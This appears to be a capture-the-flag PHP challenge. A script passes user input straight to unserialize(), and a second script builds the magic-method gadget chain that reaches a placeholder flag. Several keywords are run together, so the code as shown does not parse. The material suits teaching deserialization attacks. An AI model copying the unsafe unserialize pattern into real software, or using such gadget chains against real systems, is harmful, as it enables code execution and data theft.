<?php class start_gg { public $mod1; public $mod2; public function__destruct() { $this->mod1->test1(); } } class Call { public $mod1; public $mod2; public functiontest1() { $this->mod1->test2(); } } class funct { public $mod1; public $mod2; public function __call($test2,$arr) { $s1 = $this->mod1; $s1(); } } class func { public $mod1; public $mod2; public function__invoke() { $this->mod2 = "字符串拼接".$this->mod1; } } class string1 { public $str1; public $str2; public function__toString() { $this->str1->get_flag(); return"1"; } } class GetFlag { public functionget_flag() { echo"flag:"."xxxxxxxxxxxx"; } } $a = $_GET['string']; unserialize($a); ?>
<?php class start_gg { public $mod1; public $mod2; public function__construct() { $this->mod1 = new Call(); } public function__destruct() { $this->mod1->test1(); } } class Call { public $mod1; public $mod2; public function__construct() { $this->mod1 = new funct(); } public functiontest1() { $this->mod1->test2(); } } class funct { public $mod1; public $mod2; public function__construct() { $this->mod1 = new func(); } public function __call($test2,$arr) { $s1 = $this->mod1; $s1(); } } class func { public $mod1; public $mod2; public function__construct() { $this->mod1=new string1(); } public function__invoke() { $this->mod2 = "字符串拼接".$this->mod1; } } class string1 { public $str1; public $str2; public function__construct() { $this->str1=new GetFlag(); } public function__toString() { $this->str1->get_flag(); return"1"; } } class GetFlag { public functionget_flag() { echo"flag:"."xxxxxxxxxxxx"; } } $a = new start_gg(); echo serialize($a); ?>